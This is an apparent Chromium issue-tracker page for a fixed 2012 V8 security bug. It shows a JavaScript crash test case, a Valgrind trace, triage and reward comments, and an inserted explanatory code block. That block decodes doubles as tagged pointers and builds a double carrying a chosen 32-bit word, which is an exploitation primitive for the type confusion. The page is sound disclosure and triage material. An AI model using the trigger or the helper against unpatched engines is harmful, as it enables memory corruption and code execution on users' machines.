
Issue metadata

Status: Fixed
Closed: May 2012
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security


[LangFuzz] Crash in v8::internal::ShortCircuitConsString with invalid read

Reported by, May 14 2012

Issue description

The JavaScript code below crashes d8 shell (tested on branch 3.10 revision 11522, which is in the latest Chromium dev 20.0.1132.3) on heap with an invalid write to a strange address. 

I was not able to get a trace in Chromium itself because my test uses gc() and I don't have a debug build available that allows using --expose-gc (does Google provide Linux debug builds for download?)

Chrome Version: 20.0.1132.3 dev (only tested through shell rev 11522)
Operating System: Ubuntu 12.04 64 bit

function KeyedStoreIC(a) { a[(1)] = Math.E; }
var literal = [1.2];
literal.length = 0;
literal.push('0' && 0 );

Type of crash: tab
Crash State:

Valgrind trace in d8:

==19952== Invalid read of size 8
==19952==    at 0x52E7BC: v8::internal::ShortCircuitConsString(v8::internal::Object**) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x5378A0: v8::internal::FlexibleBodyVisitor<v8::internal::StaticMarkingVisitor, v8::internal::FixedArray::BodyDescriptor, void>::Visit(v8::internal::Map*, v8::internal::HeapObject*) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x53AD80: v8::internal::MarkCompactCollector::EmptyMarkingDeque() (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x4FD6E5: v8::internal::Isolate::Iterate(v8::internal::ObjectVisitor*, v8::internal::ThreadLocalTop*) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x4A7388: v8::internal::Heap::IterateStrongRoots(v8::internal::ObjectVisitor*, v8::internal::VisitMode) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x53BA3F: v8::internal::MarkCompactCollector::MarkLiveObjects() (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x5404B8: v8::internal::MarkCompactCollector::CollectGarbage() (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x4ABE07: v8::internal::Heap::PerformGarbageCollection(v8::internal::GarbageCollector, v8::internal::GCTracer*) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x4AC623: v8::internal::Heap::CollectGarbage(v8::internal::AllocationSpace, v8::internal::GarbageCollector, char const*, char const*) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x4ACE6A: v8::internal::Heap::CollectAllGarbage(int, char const*) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x46CC4E: v8::internal::GCExtension::GC(v8::Arguments const&) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x43D1F7: v8::internal::Builtin_HandleApiCall(v8::internal::(anonymous namespace)::BuiltinArguments<(v8::internal::BuiltinExtraArguments)1>, v8::internal::Isolate*) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==  Address 0x4005bf0a8b145768 is not stack'd, malloc'd or (recently) free'd

Status: Assigned
Danno, can you please take a look.

Christian, you can download asanified chromium debug builds from

Comment 2 by, May 14 2012


Comment 3 by, May 15 2012

I am virtually positive that this is the same as chromium:117409, which was fixed on May 9th on V8 trunk but just rolled into Chromium today. I'll double check. It is also in Chrome 20 and Chrome 19, but not Chrome 18. I'm waiting for the merge until we verify that the fix is stable in Canary.
I'm always testing on v8-trunk, not on the branches, and it reproduced for me on trunk when I reported it here.

Comment 5 by, May 15 2012

Looks like there's still a problem, this seems to be a new variant on the theme of 117409. Investigating. 

Comment 6 by, May 15 2012

It is similar but a slightly different case than 117409. Patch in progress, it will need to be merged back to 18 and 19. This bug allows you to reliably write the first element of a JSArray with any value that you can represent in the lower 32 bits of an IEEE double precision floating point number and later interpret as a tagged value, including as an object pointer.
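
The mechanism comment 6 describes, as an added example that is not part of the bug report, the patch, or V8's own code: a double stored into a double-backed JSArray is later read back as a tagged word, so its IEEE-754 bit pattern is what the GC dereferences. The helpers below (doubleToBits, bitsToDouble, interpretTagged, doubleCarryingLow32) are names chosen here; the tagging convention assumed is V8's of that era (low bit 1 = HeapObject pointer, low bit 0 = Smi, with the Smi payload in the upper 32 bits of an x64 word). The only value taken from the page is Math.E, the value the reporter's test case stores; its bit pattern with the tag bit stripped is exactly the faulting address in the Valgrind trace above.

```javascript
// Added example, not code from the bug report or from V8. It shows how the
// raw bits of a double become a tagged value once a double-backed array is
// confused into being read as a tagged-element array (comment 6).
// Tagging scheme assumed here (V8, x64, 2012): low bit 1 = HeapObject
// pointer, low bit 0 = Smi whose 32-bit payload sits in the upper half.

// 64-bit IEEE-754 bit pattern of a double, as a BigInt.
function doubleToBits(d) {
  const view = new DataView(new ArrayBuffer(8));
  view.setFloat64(0, d);          // big-endian by default
  return view.getBigUint64(0);    // read back with the same byte order
}

// Inverse: the double whose bit pattern is `bits` (denormals allowed).
function bitsToDouble(bits) {
  const view = new DataView(new ArrayBuffer(8));
  view.setBigUint64(0, BigInt.asUintN(64, bits));
  return view.getFloat64(0);
}

// Interpret a machine word the way a confused GC / IC would once it treats
// the slot as tagged: pointer with the tag bit stripped, or a Smi payload.
function interpretTagged(bits) {
  if (bits & 1n) {
    return { kind: 'HeapObject', address: bits & ~1n };
  }
  // Smi payload in the upper 32 bits (assumption stated in the lead-in).
  return { kind: 'Smi', value: Number(BigInt.asIntN(32, bits >> 32n)) };
}

// The double that carries an attacker-chosen 32-bit tagged word in its low
// 32 bits, which is what comment 6 says the bug lets you plant. The high
// word is free; pick a non-NaN exponent so the value round-trips exactly.
function doubleCarryingLow32(low32, high32 = 0) {
  const bits = (BigInt(high32 >>> 0) << 32n) | BigInt(low32 >>> 0);
  return bitsToDouble(bits);
}

function hex(b) { return '0x' + b.toString(16).padStart(16, '0'); }

// Math.E is what the reporter's test case stores into the array.
const eBits = doubleToBits(Math.E);
const seen = interpretTagged(eBits);
console.log(hex(eBits), seen.kind, hex(seen.address));
// The address printed matches the Valgrind line
// "Address 0x4005bf0a8b145768 is not stack'd, malloc'd or (recently) free'd".

// A planted word: 0x41414141 is odd, so it is read as a HeapObject pointer.
const planted = doubleCarryingLow32(0x41414141, 0x40000000);
console.log(hex(doubleToBits(planted)), interpretTagged(doubleToBits(planted)).kind);
```

Run with node. This does not reproduce the crash on a fixed engine; it only makes the bit-level correspondence visible, which is the part of comment 6 worth checking when triaging a report like this one (does the faulting address decode as a double the test case wrote?).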

Comment 7 by, May 15 2012

Labels: SecSeverity-High SecImpacts-Stable SecImpacts-Beta reward-topanel
Labels: -Pri-0 -Area-Undefined Pri-1 Area-Internals WebKit-JavaScript OS-All Mstone-19
Danno, isn't 117409 a security bug too? We need the tracking flags.

Comment 11 by, May 16 2012

Yes, sorry, 117409 is also a security bug, I thought it was already marked so. I've changed it to restrict viewing to the security team and be typed as a Security bug. Chris, can you please work your magic on the other security labels.

Comment 12 by, May 21 2012

Fix has been committed to trunk/Canary and merged back to 3.10 ( and 3.9 ( 
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
Labels: -Merge-Approved Merge-Merged
Labels: -reward-topanel reward-1000 reward-unpaid
Nice find decoder. $1000
Labels: CVE-2011-3115
Status: Fixed
Fixed with the release of 19.0.1084.52
Labels: -reward-unpaid

Comment 20 by, Mar 10 2013

Labels: -Type-Security -Area-Internals -SecSeverity-High -SecImpacts-Stable -SecImpacts-Beta -WebKit-JavaScript -Mstone-19 M-19 Cr-Content-JavaScript Security-Impact-Stable Security-Impact-Beta Cr-Internals Security-Severity-High Type-Bug-Security
Labels: -Restrict-View-SecurityNotify

Comment 22 by, Mar 21 2013

Labels: -Security-Severity-High Security_Severity-High

Comment 23 by, Mar 21 2013

Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 24 by, Mar 21 2013

Labels: -Security-Impact-Beta Security_Impact-Beta

Comment 25 by, Apr 6 2013

Labels: Cr-Blink

Comment 26 by, Apr 6 2013

Labels: -Cr-Content-JavaScript Cr-Blink-JavaScript

Comment 27 by, Jun 14 2016

Labels: -security_impact-beta

Comment 28 by, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit - Your friendly Sheriffbot

Comment 29 by, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit - Your friendly Sheriffbot
Labels: allpublic
Labels: CVE_description-submitted
